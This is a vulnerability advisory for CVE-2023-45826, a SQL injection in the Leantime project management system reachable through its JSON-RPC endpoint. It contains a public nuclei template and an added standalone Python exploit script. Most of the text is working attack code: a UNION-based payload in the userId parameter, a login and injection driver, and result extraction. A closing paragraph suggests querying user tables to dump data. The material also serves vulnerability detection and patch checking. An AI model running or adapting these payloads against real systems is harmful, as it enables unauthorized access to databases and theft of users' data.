CVE-2023-45826: Leantime < 2.4 - Authenticated SQL Injection

Date: 2025-08-01 | Affected software: Leantime | PoC: public

Vulnerability description

Leantime is an open source project management system. The `userId` value handled in `app/domain/files/repositories/class.files.php` is interpolated into the SQL query rather than bound as a parameter. An authenticated attacker can send a crafted POST request to `/api/jsonrpc` (the `leantime.rpc.files.getFilesByModule` method in the PoC below) to exploit the resulting SQL injection. Confidentiality is impacted because the injection allows dumping information from the database. The issue is fixed in version 2.4-beta-4; users are advised to upgrade. There are no known workarounds for this vulnerability.

PoC code [public]

id: CVE-2023-45826

info:
  name: Leantime < 2.4 - Authenticated SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    Leantime is an open source project management system. A 'userId' variable in `app/domain/files/repositories/class.files.php` is not parameterized. An authenticated attacker can send a carefully crafted POST request to `/api/jsonrpc` to exploit an SQL injection vulnerability. Confidentiality is impacted as it allows for dumping information from the database. This issue has been addressed in version 2.4-beta-4. Users are advised to upgrade. There are no known workarounds for this vulnerability.
  reference:
    - https://github.com/advisories/GHSA-c39w-3pjx-qc7m
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-45826
    cwe-id: CWE-89
    epss-score: 0.24206
    epss-percentile: 0.95882
    cpe: cpe:2.3:a:leantime:leantime:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: leantime
    product: leantime
    shodan-query: title:"Leantime"
  tags: cve,cve2023,leantime,authenticated,sqli

variables:
  username: "{{username}}"
  password: "{{password}}"
  marker: "{{randstr}}"
  hex_marker: "{{hex_encode(marker)}}"

http:
  - raw:
      - |
        POST /auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Connection: keep-alive

        redirectUrl=http%253A%252F%252Fpdt.re%253A8080%252Fdashboard%252Fhome&username={{username}}&password={{password}}&login=Login

    matchers:
      - type: word
        part: body
        words:
          - /dashboard/home

  - raw:
      - |
        POST /api/jsonrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"method": "leantime.rpc.files.getFilesByModule","jsonrpc": "2.0","id": "1","params": {"userId":"9 union select concat(0x{{hex_marker}},0x3a,user()),2,3,4,5,6,7,8,9,10,11-- -" } }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Request was successful'
          - "{{marker}}"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        internal: false
        regex:
          - '"\w+:(.*?)\"'
        group: 1
# digest: 4b0a0048304602210081d1e13688500956875711cb4428557133b41a6f7f469cf93b2dad396e99a592022100b804b22050881ee6e3f7afde35c9a1c63ec16c0f40aba4a9db690c701fa1db3e:922c64590222798bb761d5b6d8e72950
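The same check as a stand-alone script, so the payload construction and the response parsing can be read and tested without nuclei. This is an added example and not the template authors' code or Leantime's own code: the endpoint paths, the `userId` parameter, the `Request was successful` marker and the 11-column UNION are taken from the template above; the random-marker scheme, the `extract_result` regex and the urllib driver (including the assumption that a same-host `redirectUrl` is accepted and that a successful login lands on `/dashboard/home`) are this example's own choices.

```python
"""Offline-testable reproduction of the CVE-2023-45826 nuclei check.

Added example; not the template authors' code and not Leantime's code.
Endpoint paths, parameter name and UNION column count come from the public
template; the marker scheme, response parsing and network driver are ours.
"""
import http.cookiejar
import json
import re
import secrets
import string
import sys
import urllib.parse
import urllib.request

LOGIN_PATH = "/auth/login"
RPC_PATH = "/api/jsonrpc"
RPC_METHOD = "leantime.rpc.files.getFilesByModule"
UNION_COLUMNS = 11  # column count the public template pads the UNION to


def random_marker(length: int = 12) -> str:
    """Random alphanumeric marker: a hit on it cannot be a coincidence."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def build_rpc_payload(marker: str, expr: str = "user()") -> dict:
    """JSON-RPC body injecting into the unbound userId value.

    The marker is sent as a MySQL hex literal (0x...) so the injected string
    contains no quote characters that a filter or escaping layer could touch;
    0x3a is ':' and separates the marker from the queried expression.
    userId is used in a numeric context, so '9 union select ...' needs no
    closing quote, and '-- -' comments out the rest of the original query.
    """
    hex_marker = marker.encode().hex()
    padding = ",".join(str(i) for i in range(2, UNION_COLUMNS + 1))
    user_id = f"9 union select concat(0x{hex_marker},0x3a,{expr}),{padding}-- -"
    return {
        "method": RPC_METHOD,
        "jsonrpc": "2.0",
        "id": "1",
        "params": {"userId": user_id},
    }


def extract_result(body: str, marker: str):
    """Return the value concatenated after the marker, or None if absent.

    Anchoring on the marker (rather than the template's generic \\w+:)
    avoids picking up unrelated 'key:value' strings in the response.
    """
    if "Request was successful" not in body:
        return None
    m = re.search(r'"' + re.escape(marker) + r':(.*?)"', body)
    return m.group(1) if m else None


def run_check(base_url: str, username: str, password: str, timeout: int = 15):
    """Log in, send the injected RPC call and return the extracted value.

    Assumes a Leantime instance at base_url and that a successful login
    ends up on /dashboard/home (same condition the template matches on).
    """
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    login_form = urllib.parse.urlencode({
        "redirectUrl": base_url + "/dashboard/home",  # assumption: same-host URL accepted
        "username": username,
        "password": password,
        "login": "Login",
    }).encode()
    with opener.open(base_url + LOGIN_PATH, data=login_form, timeout=timeout) as r:
        landed = r.geturl() + r.read().decode(errors="replace")
    if "/dashboard/home" not in landed:
        raise RuntimeError("login did not reach /dashboard/home; check credentials")

    marker = random_marker()
    req = urllib.request.Request(
        base_url + RPC_PATH,
        data=json.dumps(build_rpc_payload(marker)).encode(),
        headers={"Content-Type": "application/json"},
    )
    with opener.open(req, timeout=timeout) as r:
        return extract_result(r.read().decode(errors="replace"), marker)


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} https://leantime.example username password")
    print(run_check(sys.argv[1].rstrip("/"), sys.argv[2], sys.argv[3]))
```

Swap `expr` for `database()`, `version()` or a subquery against `zp_user` style tables to confirm the dump capability the advisory describes; a `None` return with a 200 response usually means the column count differs from the template's 11 or the instance is already on 2.4-beta-4 or later.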
